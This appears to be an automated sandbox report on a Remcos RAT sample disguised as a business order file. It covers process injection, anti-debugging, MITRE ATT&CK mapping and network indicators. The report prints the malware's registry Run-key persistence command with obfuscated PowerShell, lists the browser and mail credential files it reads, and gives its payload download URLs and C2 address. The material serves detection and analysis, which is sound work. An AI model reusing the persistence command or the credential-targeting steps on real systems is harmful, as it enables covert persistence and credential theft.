            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | API call chain: ExitProcess graph end node graph_0-3821
            Source: C:\Windows\SysWOW64\msiexec.exe | API call chain: ExitProcess graph end node graph_11-34015
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04CAF520 LdrInitializeThunk,LdrInitializeThunk,2_2_04CAF520
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F52639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_22F52639
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,10_2_004044A4
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F54AB4 mov eax, dword ptr fs:[00000030h] 6_2_22F54AB4
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F5724E GetProcessHeap,6_2_22F5724E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F52639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_22F52639
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F52B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_22F52B1C
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F560E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_22F560E2

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"
            Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kyeljthgepgkbumddfxbvgcpb"
            Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\nsjeklaasxzpdjihuqsuylwgkeqq"
            Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xmowlwlbgfrcopwtdaewjyjptlizvdg"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"
            Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "loaded" /t reg_expand_sz /d "%salutbatteriernes% -windowstyle 1 $psammous=(gp -path 'hkcu:\software\absinthium\').emulsifiable;%salutbatteriernes% ($psammous)"
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerZ3
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F52933 cpuid 6_2_22F52933
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F52264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_22F52264
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,11_2_004082CD
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC

            Stealing of Sensitive Information

Source: Yara match | File source: 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1292, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: ESMTPPassword | 11_2_004033F0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword | 11_2_00402DB3
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword | 11_2_00402DB3
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 528, type: MEMORYSTR

            Remote Access Functionality

Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-NJ8CFR
Source: Yara match | File source: 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1292, type: MEMORYSTR

MITRE ATT&CK Matrix (listed per tactic; the number in brackets is the count the report shows next to that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (1); Native API (11); Command and Scripting Interpreter (12); PowerShell (2); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (412); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (412)
Credential Access: OS Credential Dumping (1); Credentials in Registry (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (27); Security Software Discovery (41); Virtualization/Sandbox Evasion (31); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Clipboard Data (2); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (113); Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

Behavior Graph (ID: 1568022; Sample: Company Profile and new order-202401127.scr.exe; Start date: 04/12/2024; Architecture: WINDOWS; Score: 100)

Contacted domains: s25.filetransfer.io; geoplugin.net; filetransfer.io
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 9 other signatures

Process tree:
• Company Profile and new order-202401127.scr.exe (started)
  Dropped: C:\Users\user\AppData\...\bordskaaneren.Exp (Unicode)
  Signatures: Suspicious powershell command line found
  • powershell.exe (started)
    Dropped: Company Profile an...r-202401127.scr.exe (PE32); Company Profile an...exe:Zone.Identifier (ASCII)
    Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 3 other signatures
    • msiexec.exe (started)
      Network: 185.29.10.213, 49825, 49840, 63650, DATACLUB-SE, European Union; filetransfer.io 104.21.13.139, 443, 49807, 49813, CLOUDFLARENETUS, United States; geoplugin.net 178.237.33.50, 49835, 80, ATOM86-ASATOM86NL, Netherlands
      Signatures: Detected Remcos RAT; Tries to steal Mail credentials (via file registry); Maps a DLL or memory area into another process
      • msiexec.exe (started)
        Signatures: Tries to harvest and steal browser information (history, passwords, etc)
      • msiexec.exe (started)
      • cmd.exe (started)
        • conhost.exe (started)
        • reg.exe (started)
      • msiexec.exe (started)
    • conhost.exe (started)

Source | Detection | Scanner
Company Profile and new order-202401127.scr.exe | 8% | ReversingLabs
Company Profile and new order-202401127.scr.exe | 14% | Virustotal

Source | Detection | Scanner
C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Company Profile and new order-202401127.scr.exe | 8% | ReversingLabs

No Antivirus matches

Source | Detection | Scanner
s25.filetransfer.io | 0% | Virustotal

Source | Detection | Scanner | Label
https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzntorage/download/Yo8ryWgWZnzn | 0% | Avira URL Cloud | safe
https://s25.filetransfer.io/ | 0% | Avira URL Cloud | safe
https://login.live.c5z | 0% | Avira URL Cloud | safe
https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn2024 | 0% | Avira URL Cloud | safe
https://s25.filetransfer.io/5 | 0% | Avira URL Cloud | safe
https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn | 0% | Avira URL Cloud | safe
https://s25.filetransfer.io/ | 0% | Virustotal | -

Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | - | high
s25.filetransfer.io | 104.21.13.139 | true | false | - | unknown
filetransfer.io | 104.21.13.139 | true | false | - | high

Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | - | high
https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn | false | Avira URL Cloud: safe | unknown
https://filetransfer.io/data-package/a8AChfye/download | false | - | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
